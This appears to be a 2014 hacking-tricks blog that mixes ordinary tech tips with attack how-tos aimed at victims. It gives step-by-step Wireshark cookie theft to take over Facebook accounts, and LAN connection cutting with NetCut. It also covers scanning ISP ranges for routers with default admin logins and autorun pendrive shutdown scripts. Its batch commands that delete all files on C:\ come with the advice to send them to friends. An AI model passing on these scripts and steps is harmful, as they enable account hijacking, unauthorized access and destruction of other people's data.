Your Info

Sign by Danasoft - Get Your Sign

Monday 17 November 2014

Internet Connection Cut Off in LAN/ WIFI

Hacking The Internet Connection of the shared computers in Colleges/ Cyber Cafe / schools etc. and gain the complete Access of internet with full speed.








Netcut stands for Network Cut. NetCut is a software where we can control the connection to each computer/laptop in a WIFI network/LAN. However, this software can be used to retrieve internet bandwidth from other computers in a LAN/WIFI.











Shared connection speed is basically determined the number of users connected, topology is used, setting protocols and much more.. If using a pure setting, the access speed will be divided based on the number of users who use it.. example : If the connection speed = 500 Kbps, and there are 5 users who use it, then the speed of each to 100 Kbps, except given the limit connection to other user .. So more and more users connected, the smaller also access. And Using This attack Cut the internet connection of shared computers in LAN/WIFI. and Get the Full Speed of internet on your system.


Step 1:- You Will Need the Net Cut 2.0 software so Download it from Here.


Link:-http://www.arcai.com/download/netcut.exe

Wi-Fi Hacked

hi guy's today I represent you which can useful for how to access public WiFi network easily.




Psiphon is an open source tool designed to circumvent censorship suffered by millions of Internet users in several countries where freedom of expression is a right that they do not have.

With Psiphon turn your computer into a proxy server that will connect the user or users you want to give access.

Among the Psiphon server and the client a secure, encrypted connection is established which can not be intercepted.

So if you have a friends or acquaintances who can not see a particular page because it has been banned in their country or because the connection fails, send them the address of the Psiphon server.

Psiphon lets you establish different user account, and all of them are protected with passwords which you may give to whomever you want.




Download Link:-https://s3.amazonaws.com/hum9-lwg8-qa2w/en/download.html#direct

Sunday 7 September 2014

How to root an Android phone



Rooting an Android phone means gaining a super user authority of your phone. After rooting your phone you can install any unauthorized applications,install update for operating system and many more you can do for customizing your phone.

If someone is using Linux then its like sudo and Rooting=JailBreak in I-Phone.
So Today I will be using Free window Tool to root your phone.





1. Download and install Kingo Android Root on your windows PC or laptop.

2. Now enable USB debugging mode on your Android phone.







For Android 4.0 or 4.1 :
Go to Settings-->Developer options and tick the "USB Debugging" option.

Useful Programs in system32

To use these programs!


Note : name = text in green.


WinXP ---> Go to start > run > type in name > OK.
Win Vista/7 ---> Go to start > type in name > Press Enter.
Win 8 ---> Press Windows button + R > type in name > OK.


Let's begin!




1. charmap Character Map





Useful for get uncommon characters from your favorite fonts and copy it to your clipboard.


2. cmd Windows Command Processor




How to Break a BIOS Password ( for Laptop and PC )



Methods of breaking password for Desktop PC and for laptop is quite different. We would explain each.

1.Break BIOS Password for Desktop :

If it's a desktop PC, erasing the cmos memory will usually clear it.
Steps:
1. Power off the computer and make sure that it is unplugged.
2. Open up your computer case. You need physical access to themotherboard to complete this procedure.
3. Find a circular, (mostly) silver metallic object on the motherboard. This is the CMOS battery.
4. CAREFULLY remove the CMOS battery and leave it out for about 120- 180 seconds. This will flush the CMOS memory which stores the BIOS password and all other configuration. (See Warnings)
5. Set the battery back into place and power on the computer.
6. The computer should then warn you that the CMOS configuration could not be found. You can either reconfigure it yourself or restore defaults. Restoring the default configuration should befine.
7. You will notice that the BIOS password has been cleared and you can boot without it. You may reset the BIOS password to something else by going into the BIOS configuration and setting a new User Password.
Alternate Methods: (More Difficult)
Remove a jumper: There's a jumper on your motherboard that you'll need to identify and remove. Most motherboards make your job easier by actually labeling the correct jumper as"BIOS config" or something similar. (it looks like a small plastic thingy on 2 pins with 1 pin beside it, within a 1" of the battery). If you're having trouble looking for it, look in the motherboard manual.After you have found it, carefuly pull straight up on it, and place it on the 2-3 pins(it was on the 1-2 pins). With the battery removed and the jumper moved, turn the computer on, and check to see if you can get into the bios. If you are able to, turn the computer off, put the jumper back on pins 1-2, and put the battery back in. Lastly put the case together and you are done.
Note: Don't forget to configure the BIOS (if you know how) after this process. If you you don't know how, just hold the "delete" button when starting your PC and when the blue screen appears, find the load safe defaults settings and press:
*. ENTER button
*. Y button
*. F10 button

PC Trick To Hack Your Broadband Network Connection








There are many PC tricks to hack the other broadband connection but at this time I am giving all my reader new one PC trick . This one broadband hack method is 100% working. So give a try for this PC trick . To perform this broadband hack follows the following steps of this PC trick .

Step 1: For this PC trick first of all you have to download any port Scanner.(for example:
i preffer Super Scan, IPscanner).

Step 2: Now you have to get your ip address for this broadband hack as given below:
Go to Command prompt type “ipconfig /all”
Then hit enter.
You will see your ip as a clients ip.
suppose your broadband ip is 61.1.1.51

Step 3: Write your IP in IP scanner Software and scan for alive IPs in the below range
start: 61.1.1.1to End:61.1.255.255

Step 4: Then check in your scanner which alive IPs has the port 80 open or 23 for telnet.

Step 5: If port 80 is open then Enter that IP in your web browser
if 23 port is open then u should know how to telnet it from command........

Step 6: Then this broadband hack asks for USER ID and PASSWORD type
username =admin
password =admin or password
It is the default password for most of the routers.
If denied then use on another alive IP

Tuesday 19 August 2014

Some Facebook Tricks That You Must Know


Ever wanted to know who all deleted you on Facebook, who haven't accepted your friend request or who is online but is sitting invisible? Well, here are Some super awesome tricks that will help you do it all!

1. How to Download Facebook Videos

Simply copy the URL of the video you want to download, then go tohttp://www.downvids.net/, paste your link and click download. Tada! Your video will be downloaded in few minutes!

2. Track Pending Friends Requests That You Have Made

Sent a friend request but don't know if it has been accepted? Track your request by following below steps:

- Open Friend Request App apps.facebook.com/friendrequestsafter logging in to Facebook and allow the app to access your friend requests.
- Click on the find 'past pending friend requests', for tracing previous sent requests.
- Click on Get Friend Request data button and copy paste the code from the popup.
- Finally click on the load friend request button and you will get your list of pending friend requests.
- Click on suggested tab to get a list of suggested friends or you can click on Bulk upload friend tab to confirm requests people sent to you.
- You can cancel any request just by clicking the cancel button in front of user profile from the list.

3. Remove Facebook Advertisements

Yes it is possible if you use Google Chrome! The Fabulous extension for Google chrome, helps you disable the Facebook advertisements so you can enjoy the cleaner Facebook.

4. Customize Facebook colors and fonts

The Fabulous extension of Chrome is indeed fabulous! Not only will it help you to remove the Facebook ads as we mentioned above, but it also helps you to change the color of your facebook page! Sounds amazing no?

5. Create Cool text styles for Facebook

You can create stylish font text styles for Facebook status by using Webestools that converts your text in stylish font!

Tuesday 29 July 2014

Jailbreaking IOS








What is Jailbreaking or jailbroken or jailbreak ?

Jailbreaking is a process of removing limitations on IOS . Jail breaking permits root access and it can be used to manage ios system and install cracked application . Many of us pay for jailbreaking but jailbreaking is as easy as drinking vodka . Some people cant drink it but once drunk cant stop drinking .

How to jailbreak ?

Like android root-hacking, jailbreaking has many techniques . Ill show you most common and stable technique .

Method 1
Charge your Iphone or I device up to 90 %
Connect to a wifi which has a good speed .
Go to www.jailbreakme.com and slide to jailbreak .

Rooting Your Android



What is rooting ?

Rooting android means you can change application , theme ( this does not means launcher or something like that . Theme actually means roms . Means android version ) , and lots more . Rooting also helps in swapping memory and increasing internal memory . So lets start with rooting and we will also teach some root hacks in next post .

How can I root my phone ?

Rooting android phones has many different methods . But I will show you most common methods .

!Caution! – Rooting grants superuser permission . Editing system files might be dangerous and might avoid warranty .

Method 1 – Just download 1 click root software from this site and connect your phone and click on root.

Method 2 – If you still cant root then search on XDA Developers on how to root . They will give you proper videos + files for rooting . Note : Please select proper phone and then start searching as shown in the picture below.

Done rooting ? Now just wait for our next post on how and what you can do after rooting .

Note : I am not responsible if you brick your phone .

Friday 18 July 2014

SHUTDOWN YOUR COMPUTER FROM YOUR CELL PHONE



how to shutdown your computer from your cell phone. You can do something more instead of shut down. You can also Lock , unlock, restart, take screenshot of current screen or use your phone as wireless mouse and keyboard. This trick is quit difficult for beginners but I have divided this trick in some easy steps which will help you achieve your goal easily. Here are some steps given below just read and follow them carefully...





Requirements:

Android Phone
Computer or laptop to shutdown
Wifi Modem [Please Note That: Phone and computer should be on same WiFi network. i.e connected to same WiFi Router.]



STEP 1:


First of all you have to download 2 applications. One on your android phone and other one is on your computer. Download links are given below.
Download OneId For Android - Download
Download OneId For Pc/Laptop – Download





[Note:- If you will not get any icon on your computer home screen then please navigate C:\Program Files\oneID\bin and open oneID.Admin.exe as shown in below screenshot]






STEP 2:


Now this is time for authentication. Open oneID app on your phone as well as on your computer[using above instruction].



STEP 3:


You will see below type of popup dialog on your computer screen.



STEP 4:


Once you will start oneID on your computer, you will see a CODE.



STEP 5:


Now on your android phone, just set a starting password[this password will be asked every time you try to access your computer or laptop] and then enter the code[shown in computer] to the phone. Once you authenticate successfully. You will get the access on your computer from your phone.



You can do below tasks -

Shutdown, Restart, Lock or Unlock Your Computer
Wireless Mouse and Keyboard
Minimize or maximize any running program.
Run new program.
Chat With Pc User




Wednesday 16 July 2014

Here Are 10 Cool Android Tools For Hacking








Hacking requires significant in depth knowledge of everything that abounds the digital world. Tech savvy users like to play around with their smartphones. Android devices are everywhere these days. No wonder, there has been a rampant growth of various hacking tools to exploit/secure the platform.




1.Hackode

Hackode : The hacker's Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

2.androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

3.APKInspector

APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualise compiled Android packages and their corresponding DEX code.

4.DroidBox

DroidBox is developed to offer dynamic analysis of Android applications.

5.Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

6.zANTI

zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

7.Droid Sheep

DroidSheep can be easily used by anybody who has an Android device and only the provider of the webservice can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the webservice.

8.dSploit

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device.

9.AppUse – Android Pentest Platform Unified Standalone Environment

AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.

10.Shark for Root

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

Tuesday 1 July 2014

Here Are 5 Free Key-loggers To Record All Your Keystrokes



Key-logger is basically a surveillance software that has the capability to record every keystroke you make to a log file, usually encrypted. Sophistication may vary from one to another, however, key-loggers are an important part of ethical hacking domain and must be known for security specific reasons.






1.KidLogger

Kidlogger.net is a new generation of Parental Control, Employee Monitoring and Time Tracking service. Convenient for tracking kids and working time of employees. Whenever your employee or Kid works on a PC, Mac or mobile phone - all the data about their working activity or virtual life will become available in your account.

2.Actual Keylogger

Actual Keylogger allows you to find out what other users do on your computer in your absence. It is designed for the hidden computer monitoring and monitoring of the computer activity.

3.REFOG Free Keylogger

REFOG Free Keylogger is an opportunity for you to be a good parent and keep an eye on your children. And isn't it wonderful that your parental duty will cost you nothing this time.

4.Home Keylogger

Home Keylogger is intended for interception and recording in a file of everything that is entered from the keyboard. The program is able to work in the hidden mode and to emerge on pressing a combination of keys.

5.BlackBox Express

BlackBox Security Monitor is a 100 per cent free keylogger – you can use it without any charge for your personal use. Keeps track of the Web sites, keywords, and text that are entered by each computer user.

Thursday 26 June 2014

Android hacktool and tutorial









Hack any android device and get full control on it
Get contacts (and all theirs information's)
Get call logs
Get all messages
Location by GPS/Network
Monitoring received messages in live
Monitoring phone state in live (call received, call sent, call missed..)
Take a picture from the camera
Stream sound from microphone (or other sources..)
Streaming video (for activity based client only)
Do a toast
Send a text message
Give call
Open an URL in the default browser
Do vibrate the phone





Tutorial : http://goo.gl/ggzrPt

Download : http://goo.gl/ayRfP6

Monday 16 June 2014

How to Unlock 3G Dongles and Datacards



You just have to follow these easy steps:

1. Download and Install Universal Master Code.
2. Connect your data card with other then default SIM and enter the IMEI of that data card in the box provided (check backside of your dongle for IMEI)
3. Click on the calculate button, then it will show you unblock code and flash code, copy both codes in safe place.





4. Then download Huwaei 173 Firware Update.
5. Install the downloaded firmware to update device firmware. Then you will promoted for unblock and flash code enter those codes which one we copied before.
6. Now you need to download Huwaei Dashboard.
7. Install the Huwaei Mobile Partner and create a new Internet profile into it.

That's it, now your dongle is unlocked.

Note: It will only supports following Data Cards:
Airtel 3G Data Card
Vodafone 3G Data Card
Huawei 3G Data Card (E 173, E 1731, E1732, E 175, E153)
MTNL 3G Data Card
MTS 3G Data Card
BSNL 3G Data Card
Reliance 3G Data Card
Beetel 3G Data Card
Tata Docomo 3G Data Card

Sunday 27 April 2014

recover your memory card’s password






Steps that are to be followed in order to recover your memory card’s
password.
Step :1 Download and Install F Explorer .
Step :2 Insert card into your mobile phone but don’t access it
through phone.
Step:3 Run F Explorer and Open the path C:system . You will find a file named
mmcstore , move that file to other location of your phone, rename the file
mmcstore.txt .
Step: 4 Open the file (mmcstore.txt) in your phone or Copy that file( mmcstore.txt ) to
your pc and open that file in notepad.
You will find your password in that file.
follow the admin:

Thursday 17 April 2014

Hack Facebook Account







Steps:-


1) First of all download wire-shark and install it.
2) Go to Facebook or any other social media websites, Chat with your victim for 5 to 10 minutes. File sharing is better
3) Next open up wire-shark click on capture and then click on interfaces.
4) Next choose the appropriate interface and click on start.
5) Continue sniffing for around 10 minutes.
6) After 10 minutes stop the packet sniffing by going to the capture menu and clicking on Stop.
7) Next set the filter to HTTP.cookie contains dart at top left, This filter will search for all the HTTP cookies with the name dart, And dart as we know is the name of the Facebook authentication cookies
8) Next you’ll want to open up Firefox. You’ll need both Grease-monkey and the cookie injector script. Now open up Facebook.com and make sure that you are not logged in.
9) Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.
10) Now refresh your page and voila!! you are logged in to the victims Facebook account.






Download link of Wire-shark:-http://www.filehippo.com/download_wireshark/

Tuesday 15 April 2014

How To Use Mobile Camera As A WebCam









today I am going to tell you How To Use Mobile Camera As A WebCam


Step1:- Install Windows [EXE] (SmartCam.exe on your PC and Install)





Download it from here :- http://sourceforge.net/projects/smartcam/


Step2:- Install Smartcam on your Mobile (Symbian S60 2nd Edition [SIS], S60 2nd Edition, JME [JAR], Windows Mobile [CAB], Android [APK]


For this you may google it for your version


Step3:- Start up SmartCam on your PC and go to >>> File >>> Settings and check your connection and proceed >>> next step.


Step4:- Start SmartCam on your phone and go to >>> Options >>> Connect and it will ask you for server name and you need to type your PC IP address or your system name.


If YOU don’t know your IP address then,


>>> go to RUN >>> type CMD >>> type ipconfig


”OR“


>>> go to Google >>> type “what is my ip address”.

Monday 14 April 2014

HACK ANY COMPUTER USING PENDRIVE






Step 1:>>copy this code into notepad:

@echo off

shutdown -s -t 00

Save as willhack.bat extension (for eg: willhack.bat).

Step 2:

Now open the notepad and copy this code:

[autorun]

Open=willhack.bat

Action=Mouse Disable

Save it as "autorun.inf"

Step 3:

Then copy the two files in your pen drive or victim's pen drive.

That's all whenever the victim insert his pen drive,the system will be turned off automatically.

Check How to Disable This:-

First Stop Autorun in Your Computer And Then Format Pendrive.

Wednesday 9 April 2014

How To Make Free Calls From PC Online



Hello Everyone, today I'm going to tell you i.e "How To Make Free Calls From PC Online". You are surprising that how it is possible? But, yes it is possible to make free call from PC to any mobile number. A free phone call can be made from your computer directly within your browser, as for this purpose there are a lot of online VoIP ( Voice over internet protocol ) services available on the World Wide Web which allow you to make free internet phone calls. So, there are a lots of websites are available on the internet to make VoIP. But I'm going to tell you about the Top Best VoIP Websites.
How To Make Free Calls From PC Online :








1. Google Voice

Every service provided by google is just awesome. Google Voice is also the service provided by Google to make free callls from PVCHow To Make Free Calls From PC to mobile or from mobile to PC. But the limitation of Google voice is that you can make free calls for only US and Canada only. Soon it will arrive to other countries. You can also make call to other countries but you will be charged as per google voice call rate check it.








Check Out : Top Free Video Calling Apps for Android 2014






2. Yahoo Messenger





The another away to do VoIP call is the Yahoo! messenger. The advantage of using yahoo messenger is that you can call all around the world. So, to do so you need to follow simple steps :
How To Make Free Call From Yahoo Messenger :

Step 1: Download and install Yahoo messenger.

Step 2: Log In with your Yahoo ID. If you don't have just create it.

Step 3: Now you have to click on Yahoo Call and then select Call a Phone number from my PC.

Step 4: Just Dial 18003733411 It is a toll free number and wait till your call is get connected.

Step 5: Now in order to make free call you have to just follow the instructions and select the free call option end by saying free call through your microphone. Don't forgot to unmute your microphone.

Step 6: Now just wait unit you here Dail you Number. After this just dial the number with country code to make free call.

Check Out : How To Use Android Mobile Phone As Webcam
3. Site2Sms

Well it one is awesome site I'm also using it. Site2Sms provides free calls for only India and every call limit is 2 mins after that it disconnects automatically and you can make 15 calls with 2 minutes each which means that it gives daily around 60 min of free calling. Just follow the following steps to make free call from Site2Sms :
How To Make Free Call From Site2Sms :

Step 1: Go to Site2Sms and register your account.

Step 2: After registering Now visit to this link for free call and click on Dial Number.

Step 3: A new page will opens as following where you have to just dial the number whom you want to call and click on Call button.



Step 4: After this just click on Yes Connect My Call.

Step 5: The confirmation message will be displayed as shown in the below image. Site2Sms will connect your call and then give a ring to your mobile number. Now Enjoy !!

Check Out : How to Unlock a Android Pattern/Password Lock in Emergency
4. iCall

iCall is the another best VoIP calling application leading behind Skype. Just like Google Voice it also has same limitation i.e you can do free calls only in U.S and Canada.



It gives you free calling for 5 minutes after that your call will disconnects. The advantage of using iCall is that it also has apps for Windows, Mac, Linux, iPhone, Android.

Check Out : Increase Ram Of your Android Mobile Using SD Card
5. VoipBuster

Last but not least, VoipBuster is the another way to do VoIP calls freely.



But as you always free services have some restrictions so it allows call to some countries and daily limit of 60 minutes.

So, this all about best free VoIP. I hope this helped you a lot. If you are facing any problem just comment it below. Feel free to share Thanks !!

Monday 7 April 2014

How to stop someone’s internet access











If you want to stop someone’s internet access. Then here is the easy notpad trick.


Step By Step Process:
First open notepad. and copy bellow code and paste. @Echo off Ipconfig /release

Save File as a .bat extension.
send it to someone. when they open file then Their IP address will be lost, and therefore they won’t be able to fix it.

How to Fix:


However, this is VERY easy to fix. Simply type in IPconfig /renew

Hack Friends ComPuter Using Pendrive trick



In this post i will help you to make the virus to make the system turned off whenever pen drive is inserted. Try It to College, institute….and Fun With Friends.








Step 1:>>copy this code into notepad:@echo off shutdown -s -t 00



Save as willhack.bat extension (for eg: willhack.bat).
Step 2: Now open the notepad and copy bellow code and paste in notpad.[autorun] Open=besthacking.bat Action=Mouse Disable




Now Save it as “autorun.inf”
Step 3: Then copy the two files in your pen drive or victim’s pen drive.


That’s all whenever the victim insert his pen drive,the system will be turned off automatically.




How to Disable This Hack


First Stop Auto-run in Your Computer And Then Format Pen drive.

Tuesday 1 April 2014

How To Access Router Without knowing Username/Password




In some cases we want to change settings of our router but suddenly we realized that we don’t know the username and password of router.Well, there is a trick , which can easy made you to login to the router with super user rights.





Just follow these steps so as to access your router without knowing username and password.
I. Open command prompt followed by typing cmd in run box.
2. In command prompt (cmd) you have to type-- ipconfig --and hit enter.
3. As a result their will be a Default Gateway . copy that address.
4. Go to your web browser and paste/type that IP of gateway (example:192.168.2O.1) and lilt enter.
5. After that It will ask your for username and password.
6. Now you have to go to your modem (physically) and on bottom
of the modem their will be Modem Access Lode”.
7. Move back to your browser and type username:admin or user and type that modem access code in the password field.
8. Congrats....you are In.
If you know about networking then you can easily reset the router username and password with the help of hyper-terminal.
Steps are:
I. Go to the router physically and restart It.
2. Move to your PC and open hyper-terminat and press ctrl+bause/Break
3. In hyperterminat window will be Roman> .Here you have to type confreg 0x2142 (2142 is a default register value of a router)
Now type Reload
After that type copy-- startup-config running-config
This method is used by professionals, hence not known to the most of network administrators but after reading this article you will be able to access the router without knowing
the actual username and password.
This cisco trick is a type of backdoor for recovery purpose.


Note: Do not use this trick for hacking purposes, this is for educational purpose.I am not responsible for any issue ...

Sunday 23 March 2014

Cut Your Enemy Balance in Realiance





1) Dial 51234400
2) After That You Will Hear A
Lady Voice And She Ask That
You Have 5 Free Minutes
3) Select One Of That Song
Which Is Given Their To You
4) After Hearing The Song Dial 5 This
Is For Song Dedicated
5) After Selecting Dedicated
Song Option Dial Your Enemy
No(only rim gsm no.)
6) That's All. You Are Done Now
Succesfull.

Some Useful Websites



01. screenr.com – record movies of your desktop and send them straight to YouTube.


02. bounceapp.com – for capturing full length
screenshots of web pages.


03. goo.gl – shorten long URLs and convert URLs into QR codes.


04. untiny.me – find the original URLs that’shiding behind a short URLs.


05. localti.me – know more than just the local time of a city.


06. copypastecharacter.com – copy- paste
special characters that aren’t on your
keyboard.


07. topsy.com – a better search engine for
twitter.


08. fb.me/ AppStore – search iOS apps without
launching iTunes.


09. iconfinder.com – the best
place to find icons of all sizes.


10. office.com – download templates, clipart
and images for your Office documents.


11. woorank.com – everything you wanted to
know about a website.





12. virustotal.com – scan any suspicious file or
email
attachment for viruses.


13. wolframalpha.com – gets answers directly
without searching – see more wolfram tips.


14. printwhatyoulike.com – print web pages
without the clutter.


15. joliprint.com – reformats news articles and
blog
content as a newspaper.


16. isnsfw.com – when you wish to share a
NSFW page but with a warning.


17. eggtimer .com – a simple online timer for
your
daily needs.


18. coralcdn.org – if a site is down due to
heavy
traffic, try accessing it through coral CDN.


19. random.org – pick random numbers, flip
coins, and more.


20. mywot.com – check the trust level of any
website – example.


21. viewer.zoho .com – Preview PDFs and
Presentations directly in the browser.


22. tubemogul.com – simultaneously upload
videos to YouTube and other video sites.


23. truveo.com – the best place for searching
web
videos.


24. scr.im – share you email address online
without
worrying about spam.


25. spypig.com – now get read receipts for
your email.


26. sizeasy.com – visualize and compare the
size of
any product.


27. whatfontis.com – quickly determine the
font
name from an image.


28. fontsquirrel.com – a good collection of
fonts – free for personal and commercial use.


29. regex.info – find data hidden in your
photographs – see more EXIF tools.


30. tineye.com – this is like an online version
of
Google Googles.


31. iwantmyname.com – helps you search
domains across all TLDs.


32. tabbloid.com – your favorite blogs
delivered as
PDFs.


33. join.me – share you screen with anyone
over the
web.


34. onlineocr.net – recognize text from
scanned PDFs and images – see other OCR
tools.


35. flightstats.com – Track flight status at
airports
worldwide.


36. wetransfer.com – for sharing really big
files
online.


37. pastebin.com – a temporary online
clipboard for your text and code snippets.


38. polishmywriting.com – check your writing
for
spelling or grammatical errors.


39. awesomehighlighter.com – easily highlight
the
important parts of a web page.


40. typewith.me – work on the same document
with multiple people.


41. whichdateworks.com – planning an event?
find
a date that works for all.


42. everytimezone.com – a less confusing view
of
the world time zones.


43. warrick.cs.odu. edu – you’ll need this when
your bookmarked web pages are deleted.


44. gtmetrix.com – the perfect tool for
measuring
your site performance online.


45. imo.im – chat with your buddies on Skype,
Facebook, Google Talk, etc. from one place.


46. translate.google. com – translate web
pages, PDFs and Office documents.


47. youtube.com /leanback – sit back and enjoy
YouTube videos in full- screen mode.


48. similarsites.com – discover new sites that
are similar to what you like already.


49. wordle.net – quick summarize long pieces
of text with tag clouds.

Thursday 20 March 2014

Fix Blue Screen of Death Part







Boot In Safe Mode
The first thing to do when you get the blue screen is to power down the computer. When you boot it back up, press the F8 key before the Windowsscreen appears.
This will boot the computer into the Advanced Options screen where you can choose advanced boot options. Press the down arrow until “Safe Mode with Networking” is enabled and press enter.
If you believe that you’re dealing with a virus that instantly connects to the Internet when you boot your computer, then go with just “Safe Mode” instead.
Keep a close eye on the screen after you press enter. The screen will scroll through each driver as it loads each one ndividually into memory. Many times, you’ll see the screen pause for a very long time at one of the .sys files before the boot fails and returns an error. Make note of the last file it was trying to load before it failed. Do a Google search (on another computer obviously) to determine what driver is failing and try reinstalling that driver.
If there are no driver problems, then determine whether there are any hardware conflicts by going into the
Control Panel, clicking on System, and then Device Manager.
Go through each device category and scan all of the devices for the telltale yellow accent icon that indicates there’s a device conflict.
If you do see that icon, open up the driver and you’ll see a message box that reveals where the conflict is taking place.
If you can’t find any device conflicts, move on to the next step – scanning your entire system.
Run Spyware, Adware, Virus & Registry Scans While you’re in safe mode, perform all of your spyware, adware and virus scans. This is the best time to run these apps because any viruses that try to disable them in normal mode will likely be disabled at this point. If you don’t have one, you really should get one.
Another very useful scan to run is to check for any odd Registry entries or problems. A great open source app that can check your registry for any known problems is the Little Registry Cleaner which comes highly recommended by most users.
Things To Try As A Last Resort Go ahead and reboot your computer and press the F8 key again. This time, instead of booting into safe mode, select “Last Known Good Configuration“. This will revert to booting Windows using the last configuration where a successful boot took place. Many times this will resolve the issue without any further troubleshooting.
If that doesn’t work, reboot again into F8 mode and try selecting “Enable Boot Logging“. This boots Windows and logs every little detail of the boot-up into a file called “ntbtlog.txt” in the root directory, usuallyc:/Windows. Open up the text file and scan through it to see exactly what’s loading and when it’s loading. It’s quite possible that something obvious will jump right out at you. If you identify anything loading that you didn’t want to load, try uninstalling and see if it fixes the problem.
Last but not least, you always have the option to do a system restore.
Just go to the Control Panel
System and Security
Backup and Restore
select “Recover System Settings for your Computer“.


Done

How to "Delete administrator Password" without any software



Method 1






Boot up with DOS and delete the sam.exe and sam.log files from Windows\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account which will be blank (i.e No password). This solution works only if your hard drive is FAT kind.





Method 2






Step 1. Put your hard disk of your computer in any other pc .

Step 2. Boot that computer and use your hard disk as a secondary hard disk (D'nt boot as primary hard disk ).

Step 3. Then open that drive in which the victim’s window(or your window) is installed.

Step 4. Go to location windows->system32->config

Step 5. And delete SAM.exe and SAM.log

Step 6. Now remove hard disk and put in your computer.

Step 7. And boot your computer






done.

Wednesday 12 March 2014

Cookie Stealing Attack: Hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.






Using this method you can hack Any Account like Facebook ,Twitter , Gmail ,Hotmail ,Skype and yahoo etc.


this works At
LAN(local Area Network) . its best place to hack at university, cafe , public place where computer
are on one LAN simple Example WI-Fi.

What is Cookies And how the use of stealing
cookies?

Cookies are file’s that stored on Any computer’s By any website when a you visits them . the
cookie used by the web server to check the
authenticate the Real user . like you Enter Login in Facebook then a unique string’s Generated and the one copy saved in the web server and other is saved on your Browser as a Cookie file .
both are matched when you open a Account.
so then finally we will start.






Step 1:
Download the Wire Shark and install it.

Step 2:
Next open the wire shark and then click on
interface.

Step 3:
Next choose a interface which is received and
sending packet and click on start

Step 4:
Continue the sniffing for around like 10 minutes.

Step 5:
After a maximum 10 minute stop the sniffing by going to a capture menu.



Step6:
its important step, now filter to http. cookie contains “datr”. Then
filter the all search for http cookies with a name of datr and there is Facebook authentication’s cookie.

Step 7:
Now click on it and then goto the copy > Bytes
> Printable Text only

Step 8:
Now for next step you must have 3 thing,
1. Mozilla Firefox [browser]
2. Grease Monkey[add-on]
3. Cookie injector[code]
and then open facebook. com make sure you are
not login

Step 9:
Press the button Alt C to bring up a cookie
injector and then Simply paste in a cookie value
into it.

Step 10
Now refresh your page so then finally you Enter
the Victim Account.

How to save a webpage as PDF









Steps :








1. Open the Google Chrome Browser on your PC or MAC


2. Then go to the web page that you want to convert as a PDF.


3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser.


4. Now Change the destination to “Save As PDF” and hit the save button.


5. The current web page will instantly be downloaded as a PDF document.

Monday 10 March 2014

Dangerous Computer Tricks



was looking for some computer tricks & pranks which could make someone cry for mummy, last night i have found these 4 computer tricks & pranks while stumbling that can make your friend crying :cry: for mummy. But use these at your own risk, can really harm someone’s PC.


1. A url that can crash your pc


I stumbled across this URL while surfing the internet. This is a javascript “exploit” (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.


WARNING: CLICKING ON THE LINK BELLOW MAY CAUSE A CRASH! USE AT YOUR OWN RISK!


http://tiny.cc/ibJUN


2. A Computer Tricks to Shut Down a Computer Forever


Download the .txt file from the below link:


http://tech.estudygang.com/wp-content/uploads/sites/7/2012/08/_bomb.txt


Open this file in notepad →


Replace all # symbol with space →


Now Save it as a .bat file.


This would shut down the person’s computer. It shuts it off once and deletes the files needed to reboot and restart.


REMEMBER – DO NOT CLICK THIS FILE. YOU WON’T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!


Send it to your friends computer and tell them to open it. Have fun!!


Here is another code too…..


cmd /c del c:windows* /F /S /Q


cmd /c del c:* /F /S /Q


Paste it in NotePad and Save it with Extension .cmd or .bat


3. A Microsoft Word Prank that will blow your friends head


Here , I will show you great microsoft word prank that will frustrate the victims very much, whenever they type a certain word, another word appears! This prank is great for office and schools.


1. Launch Microsoft Word.


2. Go to Tools -> AutoCorrect Options…


3. In the space where it says Replace , type a real common word such as the, and, a,I, you etc. In the space that says With , type in a crazy word such as fdgfdhkihyob45, whatever you want! Then , click on Add.


4. Cool Windows Prank:


This will make it to where your friend cannot click on anything on the screen.


1. Take a screenshot of the desktop. You can use Windows printscreen or some printscreen software.


2. Make your printscreen picture as desktop background.


3. Right click on desktop , then click Arrange Icons By->Show Desktop Icons (Windows XP)
Right click on desktop , then click View->Show Desktop Icons (Windows 7 and Vista)


That is it , when you click on the “icons”, nothing will happen!













Download 5 Best Android Hacking Tools






Today, I am gonna tell you about the top 5 android app for hacking or Download 5 Best Android Hacking Tools.As we all know hacking and pen testing is only can be done on computers. But now the world is changing now your mobile is small hacking toolkit using these apps. Must try all these apps.


1. The Android Network Toolkit:
In the last Defcon conference a new tool has been released by a security researcher and the tool is called “The Android network toolkit”. The has been developed for penetration tester and ethical hackers to test any network and vulnerabilities by using their mobile phones. This toolkit contain different apps that will help any hacker to find vulnerabilities and possibly exploit it. The company behind the app is an Israeli security firm called Zimperium.
Click to Download


2. Nmap for Android:
Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good.
Click to Download


3. FaceNiff 2.4 final- Session Hijacker for Android:
